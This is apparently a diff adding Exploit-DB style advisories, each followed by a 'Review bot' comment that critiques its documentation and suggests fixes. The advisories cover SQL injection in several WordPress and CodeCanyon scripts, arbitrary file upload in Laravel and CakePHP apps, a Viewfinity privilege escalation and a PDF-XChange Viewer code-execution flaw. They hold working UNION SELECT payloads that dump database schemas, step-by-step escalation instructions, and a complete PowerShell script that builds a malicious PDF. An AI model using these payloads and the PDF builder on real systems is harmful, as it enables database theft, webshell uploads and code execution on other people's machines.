# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/Employer_Details.php?id=[SQL]
# -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+-
#
# http://localhost/[PATH]/Job_Details.php?id=[SQL]
#
# Etc...
# # # # #
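Review bot: the payload here starts `-3'++UNION+ALL+SELECT` and closes with `--+-`, i.e. the `id` parameter of `Employer_Details.php` sits inside a quoted string, unlike the numeric context in the sibling advisory for the dating script; that difference is the one thing a reader porting the technique needs, so state it in words rather than leaving it to be inferred from the leading quote. `Job_Details.php?id=` is listed with no payload and no indication of whether it shares the 32-column layout; add that or drop the line.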

platforms/php/webapps/42794.txt Executable file

@ -0,0 +1,65 @@
# Exploit Title: Multiple Blind SQL Injections Wordpress Plugin: Content Timeline
# Google Dork: -
# Date: September 16, 2017
# Exploit Author: Jeroen - ITNerdbox
# Vendor Homepage: http://www.shindiristudio.com/
# Software Link: https://codecanyon.net/item/content-timeline-responsive-wordpress-plugin-for-displaying-postscategories-in-a-sliding-timeline/3027163
# Version: 4.4.2
# Tested on: Linux / Nginx / Wordpress 4.8.1 / PHP 7.0.22
# CVE : CVE-2017-14507
## Proof of Concept
http(s)://www.target.tld/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timeline={inject here}
## Problem in file : content_timeline_class.php
function ajax_frontend_get(){
$timelineId = $_GET['timeline'];
$id = $_GET['id'];
global $wpdb;
if($timelineId) {
$timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$timelineId);
$timeline = $timeline[0];
Problem exists in the GET parameter called 'timeline' which is not sanitized and used in dynamically generating the
SQL syntax.
## Problem in file : pages/content_timeline_edit.php
if(isset($_GET['id'])) {
global $wpdb;
$timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$_GET['id']);
Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the
SQL syntax.
## Problem in file : pages/content_timeline_index.php
if(isset($_GET['action']) && $_GET['action'] == 'delete') {
$wpdb->query('DELETE FROM '. $prefix . 'ctimelines WHERE id = '.$_GET['id']);
}
Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the
SQL syntax.
## History
09-16-2017 Contacted the author
09-16-2017 Requested CVE-ID
09-18-2017 CVE-ID Received
09-18-2017 Contacted the author again
09-26-2017 No reaction from author, thus releasing.
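Review bot: the advisory never says whether `ajax_frontend_get` is registered with `wp_ajax_nopriv_ctimeline_frontend_get` as well as `wp_ajax_ctimeline_frontend_get`; that single fact decides whether the first injection is reachable by an unauthenticated visitor through admin-ajax.php or needs a logged-in user, and it changes the severity more than anything else on the page, so add it. The two `pages/` issues sit behind wp-admin and therefore need at least a user who can open the plugin pages, and the `DELETE FROM ... WHERE id = '.$_GET['id']` path shows no nonce check in the quoted lines, so it is also CSRF-able; say so. For the vendor, the fix is the same in all three places, `$wpdb->get_results($wpdb->prepare("SELECT * FROM {$wpdb->prefix}ctimelines WHERE id = %d", $timelineId))` (and `%d` in the DELETE); it is worth stating, since the plugin already holds `$wpdb` and `prepare()` is the standard API.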

platforms/php/webapps/42795.txt Executable file

@ -0,0 +1,63 @@
# # # # #
# Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://teamworktec.com/
# Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089
# Demo: http://teamworktec.com/demo/job-links/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an Job Seeker & Employer users upload arbitrary file....
#
# Vulnerable Source:
#
# changes in user profile
# */
# public function profileChange(Request $request){
# $users = User::find(Auth::id());
# if (!empty($request->avatar)) {
# $large_image = public_path('uploads/'.$users->avatar);
# File::delete($large_image);
# $file = $request->avatar;
# $users->avatar = $file->getClientOriginalName();
# $users->save();
# $file->move('uploads', $file->getClientOriginalName());
# return $request->avatar->getClientOriginalName();
# } else
# return $users->avatar;
# }
#
# /*
# change Cover picture
# */
# public function coverChange(Request $request){
# $users = User::find(Auth::id());
#
# if (!empty($request->cover)) {
# $large_image = public_path('uploads/'.$users->cover);
# File::delete($large_image);
# $file = $request->cover;
# $users->cover = $file->getClientOriginalName();
# $users->save();
# $file->move('uploads', $file->getClientOriginalName());
# return $request->cover->getClientOriginalName();
# } else
# return $users->cover;
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/profile/[UserName]
# http://localhost/[PATH]/uploads/[FILE]
#
# Etc..
# # # # #
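Review bot: the quoted `profileChange`/`coverChange` code shows the defect (the file is stored under `getClientOriginalName()` with no extension or MIME check and served back from `uploads/`), but the Proof of Concept lists only the profile page and the upload directory; it never shows the upload request itself (method, route, multipart field names `avatar` and `cover`), so a reader has to reverse it from the Laravel controller. Add the request. Worth flagging for the vendor too: because the stored name is the client's, nothing stops an upload from reusing the name of a file already in `uploads/`, and `File::delete(public_path('uploads/'.$users->avatar))` then removes it on the user's next change. The fix is Laravel's validator (`'avatar' => 'image|mimes:jpg,jpeg,png|max:2048'`) plus `$file->store('avatars')`, which generates a hashed name instead of trusting the client's.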

platforms/php/webapps/42796.txt Executable file

@ -0,0 +1,48 @@
# # # # #
# Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://teamworktec.com/
# Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316
# Demo: http://sportsgrand.com/demo/ticket_plus/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
#
# public function updateProfile(Request $request) {
# $this->validate($request, [
# 'name' => 'required|max:32',
# 'username' => 'required|max:32|unique:users,username,'.Auth::id(),
# 'email' => 'email|max:40|unique:users,email,'.Auth::id()
# ]);
#
# $user = User::find(Auth::id());
# $user->name = $request->name;
# $user->username = $request->username;
# $user->email = $request->email;
# if(!empty($request->file)){
# $request->file->move('uploads', $request->file->getClientOriginalName());
# $user->avatar = $request->file->getClientOriginalName();
# }
# $user->save();
# return redirect()->back()->withMessage('Profile updated successfully');
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/profile/settings
# http://localhost/[PATH]/uploads/[FILE]
#
# Etc..
# # # # #
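Review bot: the `$this->validate($request, [...])` call at the top of `updateProfile` is the natural place for the fix and the advisory should say so: the rules cover `name`, `username` and `email` and simply omit `file`, so adding `'file' => 'nullable|image|mimes:jpg,jpeg,png|max:2048'` to that array closes the hole without touching the `move()` call. As with the sibling advisories, the PoC lists `profile/settings` and `uploads/[FILE]` but not the upload request; the multipart field is `file` per the quoted code, so show the POST.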

platforms/php/webapps/42797.txt Executable file

@ -0,0 +1,55 @@
# # # # #
# Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://teamworktec.com/
# Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244
# Demo: http://teamworktec.com/demo/photos-fusion/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
#
# /*Change profile picture*/
# public function changeAvatar(Request $request){
# if(Auth::user()){
# $user = User::find(Auth::id());
# $user->avatar = $request->picture->getClientOriginalName();
# $user->save();
# $file = $request->picture;
# $file->move('uploads', $file->getClientOriginalName());
# return $request->picture->getClientOriginalName();
# }
# return 'please login to change avatar';
# }
#
# /*Change profile cover*/
# public function changeCover(Request $request){
# if(Auth::user()){
# $user = User::find(Auth::id());
# $user->cover = $request->cover->getClientOriginalName();
# $user->save();
# $file = $request->cover;
# $file->move('uploads', $file->getClientOriginalName());
# return $request->cover->getClientOriginalName();
# }
# return 'please login to change avatar';
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/
# http://localhost/[PATH]/uploads/[FILE]
#
# Etc..
# # # # #
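Review bot: both `changeAvatar` and `changeCover` write the client-supplied original name into the user record and call `$user->save()` before `$file->move('uploads', ...)`, so a failed move still leaves a dangling `avatar`/`cover` reference, and neither method validates the uploaded file's type or extension; the advisory should point the vendor at validating the upload and generating the stored filename server-side. Minor: `changeCover` returns 'please login to change avatar', a copy-paste of the avatar message, and the description line has the same "allows an users upload arbitrary file" grammar as the previous entry.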

platforms/php/webapps/42798.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: SMSmaster Multipurpose SMS Gateway for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -23102%20UNION%20SELECT%201,2,3,4,5,(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE()),7,8--%20-
#
# Etc..
# # # # #
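Review bot: the description says "student users" and the Demo URL points at the `/school/` demo, although this entry is for the SMSmaster SMS gateway plugin; the metadata looks copied from the School Management System entry and should be checked against the product actually tested. The entry also gives no vulnerable source or remediation: naming the code that reads the `id` parameter on the `view_message` tab, and recommending a prepared statement (for WordPress, `$wpdb->prepare()`), would make the report actionable for the vendor. Since the PoC sits under `dashboard=user`, the prerequisites line should state that an authenticated user account is needed.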

platforms/php/webapps/42799.txt Executable file

@ -0,0 +1,47 @@
# # # # #
# Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703
# Demo: http://dasinfomedia.com.au/php/amc/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
#
# if(isset($id)){
# $user_d=$this->request->data;
# $this->row_update=$this->table_user->get($id);
# $this->set('emp_update_row',$this->row_update);
#
# if($this->request->is(['post','put'])){
#
# $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
#
# if($get_output == true){
#
# if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
# move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
# $this->store_image=$_FILES['image']['name'];
# }else{
# $this->store_image=$this->request->data('old_image');
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/account/profilesetting/[ID]
# http://localhost/[PATH]/img/user/[FILE]
#
# Etc..
# # # # #
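Review bot: the quoted source passes `$_FILES['image']['name']` straight into the destination of `move_uploaded_file(...$this->user_image.$_FILES['image']['name'])`, so the extension is unchecked and the name is not even passed through `basename()`; the only guard is `!empty($_FILES['image']['name'])`. The remediation is an allow-list on extension and detected MIME type plus a server-generated filename. Documentation point: the excerpt stops mid-block (the `if(isset($id))`, `if($this->request->is(...))` and `if($get_output == true)` braces are never closed), so it should be marked as truncated or completed to the end of the handler.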

platforms/php/webapps/42800.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251
# Demo: http://mobilewebs.net/mojoomla/extend/wordpress/church/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?church-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
#
# Etc..
# # # # #
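Review bot: the description "allows an student members to inject sql commands" is carried over from the School Management System entry; for a church management plugin it should name the actual role that can reach `church-dashboard=user&page=message&tab=view_message`. Like the other mojoomla entries, no vulnerable source is shown, so the vendor cannot tell from this report which query consumes the `id` parameter; quoting the query and suggesting `$wpdb->prepare()` (or an integer cast, since `id` is numeric) would close that gap.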

platforms/php/webapps/42801.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
#
# Etc..
# # # # #
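Review bot: the PoC URL is under `dashboard=user`, but the entry never states that a logged-in member account is a prerequisite; the header has "Version: N/A" even though the Software Link points at a dated CodeCanyon listing, so the tested version should be recorded. The body text and payload are byte-for-byte the same as the WPCHURCH and Hospital entries (including the "student members" wording), which suggests the shared message-viewing code is the real subject and would be better reported once with the affected products listed.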

platforms/php/webapps/42802.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Hospital Management System for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
#
# Etc..
# # # # #
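Review bot: "student members" again does not match a hospital management product, and the entry has no Solution section; with "CVE: N/A" and "Version: N/A" a downstream reader cannot tell whether the vendor was notified or which releases are affected. Suggest adding the vendor-notification status and the specific file and query behind the `view_message` tab so the fix (a prepared statement on `id`) can be verified.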

platforms/php/webapps/42804.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: School Management System for Wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
#
# Etc..
# # # # #
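Review bot: this is the one entry where "student members" fits the product, so the description is fine, but it is also the entry the others appear to have been cloned from; its Demo URL (`/school/`) is reused in the SMSmaster entry above, which should be corrected there. Missing here as in the siblings: the vulnerable source for the `id` parameter, the affected version, and a remediation line (parameterised query or integer cast on `id`).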

platforms/php/webapps/42805.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/apartment/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an student members to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/?apartment-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
#
# -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
#
# Etc..
# # # # #
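Review bot: the payload's fixed column count (eight positions, with the subquery in the sixth) implies the author knows the shape of the query behind `apartment-dashboard=user&page=message&tab=view_message`, yet the query itself is not quoted; including it would let a maintainer confirm the fix and let defenders write a detection rule for the `id` parameter on that tab. The description should also replace "student members" with the apartment-resident role that can log in to this dashboard.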


@ -0,0 +1,33 @@
# Exploit Title: Privilege Escalation via CyberArk Viewfinity <= 5.5 (5.5.10.95)
# Date: Found June 2017
# Vendor Homepage: https://www.cyberark.com/
# Version: Viewfinity version 5.5 (5.5.10.95)
# Exploit Author: Eric Guillen aka geoda
# Contact: https://twitter.com/ericsguillen
# Website: https://geodasecurity.blogspot.com/
# Tested on: Windows 7 and Windows 10
# CVE: CVE-2017-11197
# Category: Privilege Escalation
1. Description
Viewfinity allows the business to "effectively minimize local administrator privileges and control applications on endpoints and servers"
This vulnerability allows a low privilege user to escalate to an administrative user via a bug within the Viewfinity "add printer" option.
2. Proof of Concept
First, verify you are a low privilege user by running the command "net session" in a CMD prompt. Net session displays information about all sessions with the local computer. The user will get Access is denied if they do not have Administrative privileges.
1. On the system tray, right click on Viewfinity and "Open Viewfinity Control Panel..."
2. Click "Add Printer"
3. Click "Add a network, wireless or Bluetooth printer"
4. Click "The printer that I want isn't listed"
5. Click "Select a shared printer by name"
6. Click the "Browse..." icon
7. Directly in the browser window, search for "C:\windows\system32\cmd.exe" and press <Enter>
8. This will spawn a new CMD prompt. Verify you are now Administrator by typing in "net session"
3. Solution
Vendor has been notified of this vulnerability and has been addressed in the agent v6.1.1.220. Although untested, this vulnerability could be present prior to v6.1.1.220
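Review bot: the Solution sentence "Vendor has been notified of this vulnerability and has been addressed in the agent v6.1.1.220" has the wrong subject (the vulnerability, not the vendor, was addressed), and "could be present prior to v6.1.1.220" is ambiguous given that the tested build is 5.5.10.95: it should say whether the author means releases older than 5.5 or every release older than 6.1.1.220. A defender reading this also needs the CVE line and the fixed version in the Description, and a note that the mitigation is to upgrade the agent and, until then, to restrict the "Add Printer" option in the Viewfinity control panel if policy allows.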


@ -0,0 +1,81 @@
# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
# Date: 21-08-2017
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
# Exploit Author: Daniele Votta
# Contact: vottadaniele@gmail.com
# Website: https://www.linkedin.com/in/vottadaniele/
# CVE: 2017-13056
# Category: PDF Reader RCE
1. Description
This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
The launchURL() function allows an attacker to execute local files on the file
system and bypass the security dialog.
2. Proof of Concept (Generate evil PDF that start calc.exe)
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
Step 3: Open the generated PDF with Nitro Pro PDF Reader
3. PDF Generation:
function New-PDFJS {
# Use the desidered params
[CmdletBinding()]
Param (
[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
[string]$msg = "Hello PDF",
[string]$filename = "C:\Users\User\Desktop\calc.pdf"
)
# Use the PDFSharp-WPF.dll library path
Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll
$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $msg
$doc.info.Creator = "AnonymousUser"
$page = $doc.AddPage()
$graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
$font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
$box = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
$graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
$doc.Internals.AddObject($dictjs)
$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
$dict.Elements["/Names"] = $pdfarray
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs.Reference)
$doc.Internals.AddObject($dict)
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$dictgroup.Elements["/JavaScript"] = $dict.Reference
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup
$doc.Save($filename)
}
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42537.zip
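Review bot: the CVE header reads "CVE: 2017-13056" without the "CVE-" prefix, Step 3 says to open the file with "Nitro Pro PDF Reader" although the title and description target PDF-XChange Viewer 2.5 (Build 314.0), and `Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll` hard-codes the author's machine path even though Step 1 tells the reader to customise it; a `$dllPath` parameter would be cleaner. In the script body, `$doc.info.Creator` is inconsistent with `$doc.Info.Title` (harmless in PowerShell, but untidy) and line `$dictjs.Elements["/JS"] = ...;` carries a stray semicolon. The Description should state the defender-side fix: the issue is the viewer's `launchURL()` API running local files without the security dialog, so the remediation is to update PDF-XChange Viewer and, as a control, to disable JavaScript in the viewer settings.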